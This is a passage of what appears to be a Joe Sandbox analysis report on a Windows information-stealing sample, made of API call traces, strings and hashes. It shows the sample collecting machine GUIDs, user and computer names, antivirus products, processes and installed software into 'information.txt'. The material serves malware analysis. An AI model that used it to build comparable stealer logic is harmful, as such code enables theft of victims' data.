                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89acabbd3b3bcb9142fb71c04d250c140a1b1952869b262fdfeb15452caf4f24
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1671F575C03212AFEF42BF60FD5C9243BA6F7487853528427E9019A2B0EB324C64EF65

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 836 93b86-945a5 call 904e7 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90cc0 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 915d4 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 91684 call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 909a2 call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 GetCurrentProcessId call 9224a call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90b30 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 91807 call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 91997 call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90c85 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90c53 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 91563 call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90ddb call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90cc0 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90d2e call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90f51 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 91007 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90fba call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 91119 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 91192 call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 914a5 call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 90609 call 9058d call 82920 call 91203 call 905c7 call 9058d call 82920 * 2 call 91203 call 905c7 call 9058d call 82920 * 2 call 90609 call 9058d call 82920 call 81cfd lstrlenA call 904e7 call 96e97 call 82920 * 2 call 81cde
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
                                                                                                                                                                                                                                                      • Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                      • Part of subcall function 00090CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,000B65B6,?,?,?), ref: 00090CD8
                                                                                                                                                                                                                                                      • Part of subcall function 00090CC0: HeapAlloc.KERNEL32(00000000), ref: 00090CDF
                                                                                                                                                                                                                                                      • Part of subcall function 00090CC0: GetLocalTime.KERNEL32(?), ref: 00090CEB
                                                                                                                                                                                                                                                      • Part of subcall function 00090CC0: wsprintfA.USER32 ref: 00090D16
                                                                                                                                                                                                                                                      • Part of subcall function 000915D4: _memset.LIBCMT ref: 00091607
                                                                                                                                                                                                                                                      • Part of subcall function 000915D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00091626
                                                                                                                                                                                                                                                      • Part of subcall function 000915D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0009164B
                                                                                                                                                                                                                                                      • Part of subcall function 000915D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00091657
                                                                                                                                                                                                                                                      • Part of subcall function 000915D4: CharToOemA.USER32(?,?), ref: 0009166B
                                                                                                                                                                                                                                                      • Part of subcall function 00091684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0009169F
                                                                                                                                                                                                                                                      • Part of subcall function 00091684: _memset.LIBCMT ref: 000916CE
                                                                                                                                                                                                                                                      • Part of subcall function 00091684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000916F6
                                                                                                                                                                                                                                                      • Part of subcall function 00091684: lstrcatA.KERNEL32(?,000B6ECC,?,?,?,?,?), ref: 00091713
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
                                                                                                                                                                                                                                                      • Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF
                                                                                                                                                                                                                                                      • Part of subcall function 000909A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 000909D5
                                                                                                                                                                                                                                                      • Part of subcall function 000909A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00090A15
                                                                                                                                                                                                                                                      • Part of subcall function 000909A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00090A6A
                                                                                                                                                                                                                                                      • Part of subcall function 000909A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00090A71
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(Path: ,000B687C,HWID: ,000B6870,GUID: ,000B6864,00000000,MachineID: ,000B6854,00000000,Date: ,000B6848,000B6844,000B79AC,Version: ,000B65B6), ref: 00093DDB
                                                                                                                                                                                                                                                      • Part of subcall function 0009224A: OpenProcess.KERNEL32(00000410,00000000,=,00000000,?), ref: 0009226C
                                                                                                                                                                                                                                                      • Part of subcall function 0009224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00092287
                                                                                                                                                                                                                                                      • Part of subcall function 0009224A: CloseHandle.KERNEL32(00000000), ref: 0009228E
                                                                                                                                                                                                                                                      • Part of subcall function 00090B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B44
                                                                                                                                                                                                                                                      • Part of subcall function 00090B30: HeapAlloc.KERNEL32(00000000,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B4B
                                                                                                                                                                                                                                                      • Part of subcall function 00091807: __EH_prolog3_catch_GS.LIBCMT ref: 0009180E
                                                                                                                                                                                                                                                      • Part of subcall function 00091807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00093EF9,Install Date: ,000B68B0,00000000,Windows: ,000B68A0,Work Dir: In memory,000B6888), ref: 0009181F
                                                                                                                                                                                                                                                      • Part of subcall function 00091807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00091830
                                                                                                                                                                                                                                                      • Part of subcall function 00091807: CoCreateInstance.OLE32(000B2F00,00000000,00000001,000B2E30,?), ref: 0009184A
                                                                                                                                                                                                                                                      • Part of subcall function 00091807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00091880
                                                                                                                                                                                                                                                      • Part of subcall function 00091807: VariantInit.OLEAUT32(?), ref: 000918DB
                                                                                                                                                                                                                                                      • Part of subcall function 00091997: __EH_prolog3_catch.LIBCMT ref: 0009199E
                                                                                                                                                                                                                                                      • Part of subcall function 00091997: CoInitializeEx.OLE32(00000000,00000000,00000030,00093F67,?,AV: ,000B68C4,Install Date: ,000B68B0,00000000,Windows: ,000B68A0,Work Dir: In memory,000B6888), ref: 000919AD
                                                                                                                                                                                                                                                      • Part of subcall function 00091997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000919BE
                                                                                                                                                                                                                                                      • Part of subcall function 00091997: CoCreateInstance.OLE32(000B2F00,00000000,00000001,000B2E30,?), ref: 000919D8
                                                                                                                                                                                                                                                      • Part of subcall function 00091997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00091A0E
                                                                                                                                                                                                                                                      • Part of subcall function 00091997: VariantInit.OLEAUT32(?), ref: 00091A5D
                                                                                                                                                                                                                                                      • Part of subcall function 00090C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00081385), ref: 00090C91
                                                                                                                                                                                                                                                      • Part of subcall function 00090C85: HeapAlloc.KERNEL32(00000000,?,?,?,00081385), ref: 00090C98
                                                                                                                                                                                                                                                      • Part of subcall function 00090C85: GetComputerNameA.KERNEL32(00000000,00081385), ref: 00090CAC
                                                                                                                                                                                                                                                      • Part of subcall function 00090C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000813B9), ref: 00090C5F
                                                                                                                                                                                                                                                      • Part of subcall function 00090C53: HeapAlloc.KERNEL32(00000000,?,?,?,000813B9), ref: 00090C66
                                                                                                                                                                                                                                                      • Part of subcall function 00090C53: GetUserNameA.ADVAPI32(00000000,000813B9), ref: 00090C7A
                                                                                                                                                                                                                                                      • Part of subcall function 00091563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00091575
                                                                                                                                                                                                                                                      • Part of subcall function 00091563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00091580
                                                                                                                                                                                                                                                      • Part of subcall function 00091563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0009158B
                                                                                                                                                                                                                                                      • Part of subcall function 00091563: ReleaseDC.USER32(00000000,00000000), ref: 00091596
                                                                                                                                                                                                                                                      • Part of subcall function 00091563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00094098,?,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4), ref: 000915A2
                                                                                                                                                                                                                                                      • Part of subcall function 00091563: HeapAlloc.KERNEL32(00000000,?,?,00094098,?,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4,Install Date: ), ref: 000915A9
                                                                                                                                                                                                                                                      • Part of subcall function 00091563: wsprintfA.USER32 ref: 000915BB
                                                                                                                                                                                                                                                      • Part of subcall function 00090DDB: GetKeyboardLayoutList.USER32(00000000,00000000,000B670D,?,?), ref: 00090E0C
                                                                                                                                                                                                                                                      • Part of subcall function 00090DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00090E1A
                                                                                                                                                                                                                                                      • Part of subcall function 00090DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00090E28
                                                                                                                                                                                                                                                      • Part of subcall function 00090DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00090E57
                                                                                                                                                                                                                                                      • Part of subcall function 00090DDB: LocalFree.KERNEL32(00000000), ref: 00090EFF
                                                                                                                                                                                                                                                      • Part of subcall function 00090D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00090D49
                                                                                                                                                                                                                                                      • Part of subcall function 00090D2E: HeapAlloc.KERNEL32(00000000), ref: 00090D50
                                                                                                                                                                                                                                                      • Part of subcall function 00090D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00090D5F
                                                                                                                                                                                                                                                      • Part of subcall function 00090D2E: wsprintfA.USER32 ref: 00090D7D
                                                                                                                                                                                                                                                      • Part of subcall function 00090F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C), ref: 00090F65
                                                                                                                                                                                                                                                      • Part of subcall function 00090F51: HeapAlloc.KERNEL32(00000000,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C,Keyboard Languages: ,000B6910), ref: 00090F6C
                                                                                                                                                                                                                                                      • Part of subcall function 00090F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,000B6888,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ), ref: 00090F8A
                                                                                                                                                                                                                                                      • Part of subcall function 00090F51: RegQueryValueExA.KERNEL32(000B6888,00000000,00000000,00000000,000000FF,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000), ref: 00090FA6
                                                                                                                                                                                                                                                      • Part of subcall function 00090F51: RegCloseKey.ADVAPI32(000B6888,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C,Keyboard Languages: ,000B6910), ref: 00090FAF
                                                                                                                                                                                                                                                      • Part of subcall function 00091007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0009107D
                                                                                                                                                                                                                                                      • Part of subcall function 00091007: wsprintfA.USER32 ref: 000910DB
                                                                                                                                                                                                                                                      • Part of subcall function 00090FBA: GetSystemInfo.KERNEL32(?), ref: 00090FD4
                                                                                                                                                                                                                                                      • Part of subcall function 00090FBA: wsprintfA.USER32 ref: 00090FEC
                                                                                                                                                                                                                                                      • Part of subcall function 00091119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,000B6910,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4,Install Date: ), ref: 00091131
                                                                                                                                                                                                                                                      • Part of subcall function 00091119: HeapAlloc.KERNEL32(00000000), ref: 00091138
                                                                                                                                                                                                                                                      • Part of subcall function 00091119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00091154
                                                                                                                                                                                                                                                      • Part of subcall function 00091119: wsprintfA.USER32 ref: 0009117A
                                                                                                                                                                                                                                                      • Part of subcall function 000914A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000B6712,?,?), ref: 000914D4
                                                                                                                                                                                                                                                      • Part of subcall function 000914A5: Process32First.KERNEL32(00000000,00000128), ref: 000914E4
                                                                                                                                                                                                                                                      • Part of subcall function 000914A5: Process32Next.KERNEL32(00000000,00000128), ref: 00091542
                                                                                                                                                                                                                                                      • Part of subcall function 000914A5: CloseHandle.KERNEL32(00000000), ref: 0009154D
                                                                                                                                                                                                                                                      • Part of subcall function 00091203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,000B670F,00000000,?,?), ref: 00091273
                                                                                                                                                                                                                                                      • Part of subcall function 00091203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000912B0
                                                                                                                                                                                                                                                      • Part of subcall function 00091203: wsprintfA.USER32 ref: 000912DD
                                                                                                                                                                                                                                                      • Part of subcall function 00091203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 000912FC
                                                                                                                                                                                                                                                      • Part of subcall function 00091203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00091332
                                                                                                                                                                                                                                                      • Part of subcall function 00091203: lstrlenA.KERNEL32(?), ref: 00091347
                                                                                                                                                                                                                                                      • Part of subcall function 00091203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,000B6E8C), ref: 000913DC
                                                                                                                                                                                                                                                      • Part of subcall function 00091203: RegCloseKey.ADVAPI32(?), ref: 00091446
                                                                                                                                                                                                                                                      • Part of subcall function 00091203: RegCloseKey.ADVAPI32(?), ref: 00091472
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,000B6910,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000), ref: 00094563
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
                                                                                                                                                                                                                                                      • Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                    • API String ID: 478979899-1014693891
                                                                                                                                                                                                                                                    • Opcode ID: ab65ee0a1ff790315b426bfd53d9b5cc422ec04b8de4db5ece548db4eabafd88
                                                                                                                                                                                                                                                    • Instruction ID: 1ae3302dc7137206053552d555a19de41b61caf14567887c3891964d3790d3f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab65ee0a1ff790315b426bfd53d9b5cc422ec04b8de4db5ece548db4eabafd88
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA522E32D4051AAFCF01FBA4DC429DDB7B5AF15300F5281A1AA60B7163DB31BE4A9B90

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
                                                                                                                                                                                                                                                      • Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                      • Part of subcall function 000968C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0009691A
                                                                                                                                                                                                                                                      • Part of subcall function 000968C6: lstrlenA.KERNEL32(?), ref: 00096925
                                                                                                                                                                                                                                                      • Part of subcall function 000968C6: StrStrA.SHLWAPI(00000000,?), ref: 0009693A
                                                                                                                                                                                                                                                      • Part of subcall function 000968C6: lstrlenA.KERNEL32(?), ref: 00096949
                                                                                                                                                                                                                                                      • Part of subcall function 000968C6: lstrlenA.KERNEL32(00000000), ref: 00096962
                                                                                                                                                                                                                                                      • Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00096AA0
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00096AF9
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00096B59
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00096BB2
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00096BC8
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00096BDE
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 00096BF0
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 00096BFF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                                                    • String ID: .v$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                                                                                                    • API String ID: 2840494320-2870038134
                                                                                                                                                                                                                                                    • Opcode ID: edf474505aa3d028428d2fd21d76859c4025167cd4f675a2b3c15e1b0d4a27a1
                                                                                                                                                                                                                                                    • Instruction ID: b1fd4c4f3c7d61a4c780cc8e70bbadb97667cc33a667856f67d3a43317555de1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: edf474505aa3d028428d2fd21d76859c4025167cd4f675a2b3c15e1b0d4a27a1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9491D471E40118ABCF50FBA4EC47ADDB7B4BF00700F518161FA54BB162DB35AE4A9B91

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1487 81666-8169e GetTempPathW 1488 81809-8180b 1487->1488 1489 816a4-816cb wsprintfW 1487->1489 1491 817fa-81808 call 9d016 1488->1491 1490 816d0-816f5 CreateFileW 1489->1490 1490->1488 1493 816fb-8174e GetProcessHeap RtlAllocateHeap _time64 srand rand call a3c10 WriteFile 1490->1493 1493->1488 1497 81754-8175a 1493->1497 1497->1488 1498 81760-8179c call a3c10 CloseHandle CreateFileW 1497->1498 1498->1488 1501 8179e-817b1 ReadFile 1498->1501 1501->1488 1502 817b3-817b9 1501->1502 1502->1488 1503 817bb-817f1 call a3c10 GetProcessHeap RtlFreeHeap CloseHandle 1502->1503 1503->1490 1506 817f7-817f9 1503->1506 1506->1491
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00081696
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 000816BC
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 000816E6
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 000816FE
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00081705
                                                                                                                                                                                                                                                    • _time64.MSVCRT ref: 0008170E
                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 00081715
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0008171E
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0008172E
